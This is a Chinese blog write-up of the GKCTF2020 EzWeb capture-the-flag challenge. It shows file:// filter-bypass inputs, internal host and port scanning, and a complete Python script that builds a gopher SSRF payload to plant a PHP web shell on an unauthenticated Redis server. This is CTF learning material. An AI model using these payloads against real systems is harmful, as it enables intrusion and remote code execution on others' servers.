[GKCTF2020]EZ三剑客-EzWeb

最新推荐文章于 2023-04-26 21:09:02 发布
最新推荐文章于 2023-04-26 21:09:02 发布
阅读量356 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/114232828
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

考点

  • ssrf redis反弹shell

知识点:
SSRF漏洞利用讲解

在这里插入图片描述

在这里插入图片描述

启动:在这里插入图片描述
查看页面源代码,发现有一个注释在这里插入图片描述
在url里访问一下:在这里插入图片描述
得到一串ifconfig的结果,看到网络配置信息。在这里插入图片描述
尝试访问了一下这个内网ip 173.13.144.10,发现回显了本页面,因此猜测可能是内网中有内容。
猜测可能存在是ssrf
给了ip,想一想也知道这应该是个ssrf的题。我们试一下file协议读文件:在这里插入图片描述
发现file协议被过滤了,我们可以尝试绕过:file:/、file:<空格>///
如下:

file:/var/www/html/index.php
file: ///var/www/html/index.php

在这里插入图片描述
得到源码:

<?php
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
		$url = $_GET['url'];
		//echo $url."\n";
		if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
		{
			//var_dump($match);
			die('别这样');
		}
		curl($url);
}
if(isset($_GET['secret'])){
	system('ifconfig');
}
?>

从源码中可知过滤了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议
DICT协议
gopher攻击redis原理
我们使用http协议进行内网主机存活探测。用burp抓包,跑字典:在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里扫到了173.96.119.6/5/7/10/11,这几台主机都存活,在看到173.96.119.11这台机子时给出了提示:在这里插入图片描述
说让试试不同的端口(服务)。应该是猜测6379端口(redis)或3306端口(mysql)。发现是6379端口。
再次抓包跑字典:
在这里插入图片描述
然后这里需要将线程调低点,不然访问太快容易429在这里插入图片描述
在这里插入图片描述
扫描到6379端口,redis服务,我们利用redis未授权访问的漏洞,在根目录下生成个文件shell.php
,这里的dict协议也被过滤了,所以得用gopher协议。(gopher攻击的原理也就是利用gopher来生成一个符合redis RESP协议的payload)

大神的脚本:

import urllib
protocol="gopher://"
ip="10.83.244.11"
port="6379"
#shell="\n\n<?php eval($_POST[\"cmd\"]);?>\n\n"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="223.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload

这里也可以使用Gopherus这款工具,可以直接构造mysql、redis等gopher的payload。

注意是python的脚本,用python2生成出EXP:
在这里插入图片描述
然后就是打了。如果是在那个输入框的话,就不需要再来一次URL编码。如果是用hackbar的话,就需要再来一次url编码。
打完之后再访问一下10.83.244.11/223.php,就可以看到命令执行的结果了:在这里插入图片描述

无尽星河-深空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第二周任务[GKCTF2020]
Lumos427的博客
03-26 608
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
开源宝藏探秘:EZ漏洞扫描器,安全测试的得力助手
最新发布
gitblog_00049的博客
06-19 657
开源宝藏探秘:EZ漏洞扫描器,安全测试的得力助手 项目地址:https://gitcode.com/m_sec_org/EZ 在信息安全的战场中,有一款名为EZ的跨平台利器,它以强大的功能集合和高效的安全测试能力脱颖而出。今天,让我们深入挖掘这款神器,探讨它的技术精粹,应用场景,以及为何它能成为每一位网络安全专家的口袋宝典。 项目介绍 EZ,一款集大成者的安全扫描工具,旨在为渗透测试提供一站式解...
[GKCTF 2020]ez三剑客-ezweb
m0_70819573的博客
04-16 298
是输入url的题目,基本可以判断是ssrf的题目,尝试用file伪协议读取index.php源码.发现被过滤了,尝试file:/、file:///,成功获得index.php的源码。盲猜redit默认端口6379和mysql默认端口3306,发现redit服务有回显。利用redis服务未授权访问漏洞在根目录创建shell.php。查看页面源码,发现可以进行secret传参,获得内网信息。用薄荷扫描内网c段寻找存活主机,发现提示。访问/shell.php得到flag。
[GKCTF2020]EZ三剑客-EzWeb(SSRF)
qq_45521281的博客
06-03 4643
查看源码发现提示: 在url里访问一下: 得到一串ifconfig的结果,整理一下的: eth0 Link encap:Ethernet HWaddr 02:42:ad:62:04:0a inet addr:173.96.119.10 Bcast:173.98.4.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 RX pac.
GKCTF2020 web+misc
xlcvv的博客
05-25 1340
CheckIN(unsolved) 考点:代码审计,绕disable_functions 题目给了源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() {
周任务【二】之GKCTF
一只菜鸡
03-26 492
WEB cve版签到 0x01 打开场景,页面提示我们只能访问*.ctfhub.com 点击上面的链接可以在页面中发现该页面下很多的信息 但是找了一下发现没有能够帮助我们拿到flag的信息,再次返回到一开始的页面,从我们只能访问*.ctfhub.com中可以猜测,是不是*可以是任何的东西,那这样我们是否可以实现访问本地127.0.0.1呢 一开始想到了前几天学长根据一个ssrf题目讲的知识点 但是试了一下之后发现不正确,因为题目要求的是.ctfhub.com,没办法用@进行分隔,后来又想到可以用%00
EZWebAlbum-开源
05-09
EZWebAlbum是一个开源的Web相册系统,设计用于在互联网上展示个人或集体的照片集。... 首先,从标题“EZWebAlbum-开源”我们可以得知,这是一个开放源代码的项目,意味着其源代码可供公众查看、使用、修改和分发。...
GKCTF EZ三剑客-EzWeb 题目分析总结
crispr的博客
06-30 2567
此篇文章在安全客首发,仅转载到个人博客 https://www.anquanke.com/post/id/209117 前言 刚考完考试自己在buu上复现的,之前没来得及做,复习去了,虽然还是考的很菜(我是fw 。记录一下学习过程吧 正言 GKCTF EZ三剑客-EzWeb 看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。 嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现: 这就很敏感了,相当于一个 ifconfig 的命令,这个时.
[GKCTF2020]EZ三剑客-EzNode
feng的博客
02-16 986
前言 之前buu上刷到这题的时候,感觉是个前端的题,就绕过没看了。今天在某平台做红包题遇到了基本上考点一样的题目,在学长的指引下又把这题给做了一下,总的来说还算比较友好,因为我不会前端我也大致能看懂这题是啥意思。 WP 进入环境是个计算器,看一下源代码: const express = require('express'); const bodyParser = require('body-parser'); const saferEval = require('safer-eval'); // 2019
kalmarCTF(WEB|EZ)WP
记录学习,一起进步
03-23 473
kalmarCTF(WEB|EZ)WP
[GDOUCTF 2023]EZ WEB 学习笔记
ZhangAweio的博客
04-26 750
其中 '/super-secret-route-nobody-will-guess' 路由返回的内容可能是敏感信息。看到题目没啥提示,说他保证flag就在附近。那我们只需要抓包、改包发送PUT请求就行了。发现了个提示的文件/src 我们打开它。我们F12查看源码看看有啥有用的东西。
ctf php 流量分析题,GKCTF EZWEB的分析题解和思考
weixin_35674742的博客
03-09 502
GKCTF EZ三剑客-EzWeb看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现:这就很敏感了,相当于一个ifconfig的命令,这个时候应该是SSRF打内网,看内网的存活主机有多少,直接burp抓个包爆破一下有新发现:这个IP的其他端口有问题?不多说,nmap一把梭看看有哪些常见=...
GKCTF复现-web
qq_44657899的博客
03-17 535
文章目录[GKCTF2020]CheckIN[GKCTF2020]cve版签到[GKCTF2020]老八小超市儿(shopxo后台全版本拿shell)[GKCTF2020]EZ三剑客-EzWeb(redis未授权访问)一,信息收集二,bp扫C段:三,扫端口四,利用脚本生成payload [GKCTF2020]CheckIN [GKCTF2020]cve版签到 [GKCTF2020]老八小超市儿(shopxo后台全版本拿shell) 渗透测试|shopxo后台全版本获取shell复现 跟着这篇文章一步步做就能
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1324
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
BUUCTF:[GKCTF2020]Harley Quinn
qq_46230755的博客
12-21 400
题目有hint 根据压缩包判断为音频隐写题 打开音频文件发现存在提示 应该是一个21位的密码 到结尾部分,有电话音的声音,用工具dtmf2num进行破解:dtmf2num下载地址 记得这里要将音频进行剪切,我把提取出来的部分命名为1.wav 得到的字符串为 #22283334447777338866# 数了一下发现密码少了一位,对比频谱图发现因为播放速度的原因少分析了一位,结合前后频谱得到正确结果: 22283334447777338866 hint提示其中数字对应的就是手机上密码 最后得到.
HECTF2023 Web挑战心得:身份验证与SSRF攻防
在HECTF2023的校内网络安全竞赛中,参赛者分享了解决两道web CTF题目——"伪装者"和"EZweb"的经历和方法。首先,我们来看看"伪装者"挑战。 1. 伪装者: - 题目涉及HTTP头信息的欺骗,如X-Forwarded-For、Referer和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值